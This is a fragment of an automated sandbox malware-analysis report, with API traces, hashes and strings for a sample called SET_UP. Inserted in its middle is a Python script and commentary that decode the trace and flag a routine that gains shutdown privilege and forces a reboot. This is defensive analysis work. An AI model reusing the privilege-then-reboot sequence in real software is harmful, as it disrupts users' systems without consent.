                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                                                                                                                                                                                  • String ID: ./\$-B
                                                                                                                                                                                                  • API String ID: 816071114-1859117140
                                                                                                                                                                                                  • Opcode ID: ef59506aa57cca7fbe586ebfd5e2dfeb3c7db813330021b870f40605f0b7e9d6
                                                                                                                                                                                                  • Instruction ID: 3b43b2ae1769a536af764b24c5ef84b160be1ce531aadd1fa711d00e93a33e29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef59506aa57cca7fbe586ebfd5e2dfeb3c7db813330021b870f40605f0b7e9d6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91814271800219AECF20AFEA8C44AAFBBBCFF05715F1045AFF545D6150EB389940CB69
APIs
• CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 004AC4FA
• DefWindowProcA.USER32(00000000,?,?,?), ref: 004AC50D
• IsIconic.USER32(00000000), ref: 004AC52F
• SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 004AC55C
• GetWindowLongA.USER32(00000000,000000F0), ref: 004AC56B
• GetWindowDC.USER32(00000000), ref: 004AC5AC
• GetWindowRect.USER32(00000000,?), ref: 004AC5BA
• InflateRect.USER32(?,000000FF,000000FF), ref: 004AC5FD
• InflateRect.USER32(?,000000FF,000000FF), ref: 004AC620
• SelectObject.GDI32(00000000,?), ref: 004AC62E
• OffsetRect.USER32(?,?,00000000), ref: 004AC684
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
• String ID:
• API String ID: 2215177122-0
• Opcode ID: ddee0ca52af866fb8d914bc6a9c5a848ec0f9968a1bd6099e93802d0175e0702
• Instruction ID: b4899f8dc0458f595c0a6581c64c733003fd925ac129564273eda8a89bbcac18
• Opcode Fuzzy Hash: ddee0ca52af866fb8d914bc6a9c5a848ec0f9968a1bd6099e93802d0175e0702
• Instruction Fuzzy Hash: 6F81A975608301AFC340CF68DC85E6BB7E4FB99318F004A2DF98587291E775E906CBA6
APIs
• GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004B5486,?,00020000,?,?,?,004B05DC,00001000,?,?,?,0040DE70), ref: 004B5195
• LoadLibraryA.KERNEL32(COMCTL32.DLL,?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B519E
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004B51B2
• #17.COMCTL32(?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B51CD
• #17.COMCTL32(?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B51E9
• FreeLibrary.KERNEL32(00000000,?,?,?,004B05DC,00001000,?,?,?,0040DE70,?,00000000,5000001C,00000000), ref: 004B51F5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Library$AddressFreeHandleLoadModuleProc
• String ID: COMCTL32.DLL$InitCommonControlsEx
• API String ID: 1437655972-4218389149
• Opcode ID: a63016164256eab557a4637b560a9335cfc19b9ead63ecbb56627adf215bf059
• Instruction ID: 6c01398aa721e929aa4b5f9f759286312cb1bd5f068da7228324b6e718ffc8d5
• Opcode Fuzzy Hash: a63016164256eab557a4637b560a9335cfc19b9ead63ecbb56627adf215bf059
• Instruction Fuzzy Hash: B5F0A932A007538B57116B7A9C88F5BB6A8EB947517150436F940E3310DB68DC01877E
APIs
  • Part of subcall function 00431D6C: GetParent.USER32(?), ref: 00431D76
• ScreenToClient.USER32(?,?), ref: 004BCBD5
• GetKeyState.USER32(00000001), ref: 004BCC32
• GetKeyState.USER32(00000001), ref: 004BCC84
• GetKeyState.USER32(00000001), ref: 004BCCBA
• KillTimer.USER32(?,0000E001), ref: 004BCCDF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: State$ClientKillParentScreenTimer
• String ID: (
• API String ID: 2757461879-3887548279
• Opcode ID: be938f7f6e81982a6cd687f9d3054f58a887cfe49e68c227d03ebd911450df42
• Instruction ID: ee73bc5dc220f15731f4cd434d2c0ff70ae30208cfcda09ece6814647d33f380
• Opcode Fuzzy Hash: be938f7f6e81982a6cd687f9d3054f58a887cfe49e68c227d03ebd911450df42
• Instruction Fuzzy Hash: 6451BE35A00205DFDF209F99C8C9BEE7FB1AF58314F10046BE419A72D1C7799981CB69
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041D57C
• OpenProcessToken.ADVAPI32(00000000), ref: 0041D583
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041D597
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041D5B6
• ExitWindowsEx.USER32(00000002,00000000), ref: 0041D5C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                  • API String ID: 1314775590-3733053543
                                                                                                                                                                                                  • Opcode ID: 47321aa7752040917e2e2db6574ec68361b85e0bad87c551a54c0c168b1cdfb9
                                                                                                                                                                                                  • Instruction ID: cd9c67435ba51d4f293e9364d24854e77aa97465d4f2a52b3b4f6194601ac37c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47321aa7752040917e2e2db6574ec68361b85e0bad87c551a54c0c168b1cdfb9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84F037B1901129BBDB10ABA2DD0CEEF7EBCEF05744F100065F905E2151D7749B44CBA9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID: TLK
• API String ID: 0-691455855
• Opcode ID: 72299d42923f559e7bf2da4e87230d0e64c44de85820520eb25f53adf5de2d4c
• Instruction ID: 9c0f4c6780fcd5cbc0c5c4ff472857b190525ed82c8705d2072ab71f2fb27165
• Opcode Fuzzy Hash: 72299d42923f559e7bf2da4e87230d0e64c44de85820520eb25f53adf5de2d4c
• Instruction Fuzzy Hash: EEF04F3110464DABCF036FA1CD08AAE3FB8AF04344F248032F906D5160EB39DA56EB5A
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5f78daad42caf713cc074343fdb3ae219e24cd5723981301c75ef80854d8089b
• Instruction ID: 71aa9ba6d2822fce9c93e48592105f1161e2e03d17dd82bfb95b9ff2539b45b0
• Opcode Fuzzy Hash: 5f78daad42caf713cc074343fdb3ae219e24cd5723981301c75ef80854d8089b
• Instruction Fuzzy Hash: E7B135B160C382CBD309DF11D09425BBFE1FBC9344F518E5EE4C692265E7348A698B8B
APIs
• GetParent.USER32(?), ref: 00408114
• GetKeyState.USER32(00000010), ref: 0040812F
• GetKeyState.USER32(00000011), ref: 0040813B
• PostMessageW.USER32(?,00000111,0000800E,00000000), ref: 0040816D
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: State$MessageParentPost
• String ID:
• API String ID: 3389659062-0
• Opcode ID: 5de91a338267ed57d62910bfaa1db84a37d93785dee4ec1d9cd341ff2d44b484
• Instruction ID: 10efcba8e10da501b469e1274d0fc4ad6cc4ced9e6653cde3d127f9ef6c09f72
• Opcode Fuzzy Hash: 5de91a338267ed57d62910bfaa1db84a37d93785dee4ec1d9cd341ff2d44b484
• Instruction Fuzzy Hash: 7401F136310205AEEB146B759D46FAA3268AF24364F04087FF241BB2E1CFB898469719
APIs
  • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
• GetKeyState.USER32(00000010), ref: 004B488F
• GetKeyState.USER32(00000011), ref: 004B4898
• GetKeyState.USER32(00000012), ref: 004B48A1
• SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 004B48B7
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: State$LongMessageSendWindow
• String ID:
• API String ID: 1063413437-0
• Opcode ID: ab31869e94c7246c0db5bc6cd18114ca45597ccb8df6211dfc86f5288c57dc99
• Instruction ID: fe42ac8c9e3b4bdcbc4ab34818f9803fec0e6c5a31f96b1f8c7c79508b8f5f8e
• Opcode Fuzzy Hash: ab31869e94c7246c0db5bc6cd18114ca45597ccb8df6211dfc86f5288c57dc99
• Instruction Fuzzy Hash: AAF0A77AF403C525E920369A5C42FE543144FD0BD4F40463FB741BE1D38BD98C0A567A
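The API listings above print raw hex arguments. The routine at 0041D57C..0041D5C4 (LookupPrivilegeValueW with SeShutdownPrivilege, AdjustTokenPrivileges, then ExitWindowsEx(00000002,00000000)) is the code the report's "Contains functionality to shutdown / reboot the system" signature keys on, and the two GetKeyState/WM_COMMAND routines are modifier-key checks that post or send a menu command. The following Python is an added example and is not part of the Joe Sandbox report or of the sample: it parses lines in this report's "APIs" format, decodes the numeric arguments against the Windows SDK constants (winnt.h, winuser.h), and flags the privilege-then-ExitWindowsEx sequence. The sample text is copied from the two entries above; the function names (parse_apis, annotate, reboot_pattern, decode_flags) are mine. One reading is mine rather than the report's: GetCurrentProcess takes no parameters, so the 00000028 printed beside it is taken to be a value already sitting on the stack, and 0x28 equals TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, the access a caller normally requests from OpenProcessToken before AdjustTokenPrivileges.

```python
"""Decode Joe Sandbox 'APIs' listings into named Win32 constants and flag the
privilege-then-ExitWindowsEx sequence. Added example, not part of the report.
Constant values are the Windows SDK definitions (winnt.h / winuser.h)."""
import re
from typing import Optional

TOKEN_ACCESS = {0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
                0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
                0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
                0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
                0x0100: "TOKEN_ADJUST_SESSIONID"}
EWX_FLAGS = {0x01: "EWX_SHUTDOWN", 0x02: "EWX_REBOOT", 0x04: "EWX_FORCE",
             0x08: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
WM_COMMAND = 0x0111

# One line of the report's "APIs" list, with or without the
# "Part of subcall function XXXXXXXX:" prefix.
API_RE = re.compile(
    r"•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})")


def parse_arg(tok: str):
    """'?' -> None (unresolved), 8 hex digits -> int, anything else -> str."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok


def parse_apis(text: str) -> list:
    calls = []
    for m in API_RE.finditer(text):
        raw = m["args"]
        args = [parse_arg(a) for a in raw.split(",")] if raw.strip() else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def decode_flags(value: int, table: dict) -> str:
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)  # bits the table does not name
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def annotate(call: dict) -> Optional[str]:
    api, args = call["api"], call["args"]
    if api == "ExitWindowsEx" and args and isinstance(args[0], int):
        return f"ExitWindowsEx flags={decode_flags(args[0], EWX_FLAGS)}"
    if api == "GetCurrentProcess" and args and isinstance(args[0], int):
        # Interpretation (mine): GetCurrentProcess has no parameters, so the
        # printed value is whatever is on the stack; 0x28 matches the
        # DesiredAccess usually handed to OpenProcessToken right after.
        return f"stack value at GetCurrentProcess: {decode_flags(args[0], TOKEN_ACCESS)}"
    if api == "GetKeyState" and args and isinstance(args[0], int):
        return f"GetKeyState({VK_NAMES.get(args[0], hex(args[0]))})"
    if (api in ("PostMessageW", "SendMessageW") and len(args) >= 3
            and args[1] == WM_COMMAND and isinstance(args[2], int)):
        return f"{api} WM_COMMAND wParam={args[2]:#06x}"
    return None


def reboot_pattern(calls: list) -> bool:
    """True when one routine enables SeShutdownPrivilege and calls ExitWindowsEx."""
    apis = {c["api"] for c in calls}
    has_priv = any(c["api"] == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in c["args"]
                   for c in calls)
    return has_priv and {"AdjustTokenPrivileges", "ExitWindowsEx"} <= apis


# Copied from the report's API listings above.
SAMPLE_SHUTDOWN = """\
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041D57C
• OpenProcessToken.ADVAPI32(00000000), ref: 0041D583
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041D597
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041D5B6
• ExitWindowsEx.USER32(00000002,00000000), ref: 0041D5C4
"""
SAMPLE_KEYSTATE = """\
  • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
• GetKeyState.USER32(00000010), ref: 004B488F
• GetKeyState.USER32(00000011), ref: 004B4898
• GetKeyState.USER32(00000012), ref: 004B48A1
• SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 004B48B7
"""

if __name__ == "__main__":
    for name, text in (("shutdown", SAMPLE_SHUTDOWN), ("keystate", SAMPLE_KEYSTATE)):
        calls = parse_apis(text)
        print(f"[{name}] reboot pattern: {reboot_pattern(calls)}")
        for c in calls:
            note = annotate(c)
            if note:
                print(f"  {c['ref']:08X} {note}")
```

The privilege step is what makes the indicator strong: ExitWindowsEx requires SE_SHUTDOWN_NAME on the caller's token, so a routine that only calls ExitWindowsEx without AdjustTokenPrivileges would usually fail, while the sequence above is the working form. The modifier-key and WM_COMMAND routines are consistent with the GUI and hotkey runtime one expects in a compiled AutoHotkey binary, which is what the report identifies this sample as, and on their own are not malicious behaviour.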
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0049D76C: InitializeCriticalSection.KERNEL32(00000000,?,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7A9
                                                                                                                                                                                                    • Part of subcall function 0049D76C: EnterCriticalSection.KERNEL32(00000010,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7C4
                                                                                                                                                                                                    • Part of subcall function 0049D7CD: LeaveCriticalSection.KERNEL32(?,00497880,00000009,0049786E,00000000,00000010,00000000,?,00497754,00000009,?,00000000), ref: 0049D7DA
                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(0000000C,00000000,0000000C,?,0000000B,0000000B,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000,00000001), ref: 004A53AB
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000220,0050B88C,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A5441
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000220,0050B8E0,000000FF,0000003F,00000000,00000000,?,0000000B,0000000B,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A547A
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
• String ID:
• API String ID: 3442286286-0
APIs
• FindResourceW.KERNEL32(?,?,000000F0,?,?,?,004B7122,?,?,0040C691), ref: 004B4D40
• LoadResource.KERNEL32(?,00000000,?,?,?,004B7122,?,?,0040C691), ref: 004B4D4C
• LockResource.KERNEL32(00000000,?,?,?,004B7122,?,?,0040C691), ref: 004B4D5B
Similarity
• API ID: Resource$FindLoadLock
• String ID:
• API String ID: 2752051264-0
APIs
• __ftol.LIBCMT ref: 00448CC2
• __ftol.LIBCMT ref: 00448CEF
  • Part of subcall function 0049841C: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0049689D,00000000), ref: 0049844A
Similarity
• API ID: __ftol$ExceptionRaise
• String ID:
• API String ID: 958255650-0
APIs
  • Part of subcall function 004B7CBA: __EH_prolog.LIBCMT ref: 004B7CBF
  • Part of subcall function 004B7CBA: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004B7CDD
  • Part of subcall function 004B7CBA: lstrcpynW.KERNEL32(?,?,00000104), ref: 004B7CEC
• FindFirstFileW.KERNEL32(?,?,?,?), ref: 004B8FFF
• FindClose.KERNEL32(00000000), ref: 004B9011
  • Part of subcall function 004B0002: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004B0012
  • Part of subcall function 004B0002: FileTimeToSystemTime.KERNEL32(?,?), ref: 004B0024
Similarity
• API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
• String ID:
• API String ID: 1806329094-0
Strings
• Decode: Unknown or wrong format, xrefs: 0043D911
• null file handler, xrefs: 0043D4D9
Similarity
• API ID:
• String ID: Decode: Unknown or wrong format$null file handler
• API String ID: 0-166038648
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID: ,)P
• API String ID: 0-3778783369
• Opcode ID: 58981f3f00ae2510bd52b7fc36a66af10b0968ae765d24fd06e3c2d7e2b42834
• Instruction ID: d7941b517d8358b44f4d42ddf6ab973d179af12006e9fefa380875bce8641912
• Opcode Fuzzy Hash: 58981f3f00ae2510bd52b7fc36a66af10b0968ae765d24fd06e3c2d7e2b42834
• Instruction Fuzzy Hash: DD725D716087028FCB18EF18D49066EB7E2FFC9304F14496EE8968B785E778D945CB86
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID: ,+P
• API String ID: 0-3540896267
• Opcode ID: 9e8d729ec05c48d1d3df0ff96f1d213b7395ed71362c899847de2dd40e6ec837
• Instruction ID: d741632ffd3c571c0ed3bd8caf1626c6c621062a23966496b2ee7024da6fd6a9
• Opcode Fuzzy Hash: 9e8d729ec05c48d1d3df0ff96f1d213b7395ed71362c899847de2dd40e6ec837
• Instruction Fuzzy Hash: 2B624C74600B018FC738DF19D990A6BB7E2EF95710B148E2EE88687B51D734F846CBA5
Strings
• invalid background gamma type, xrefs: 0047C7C5
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
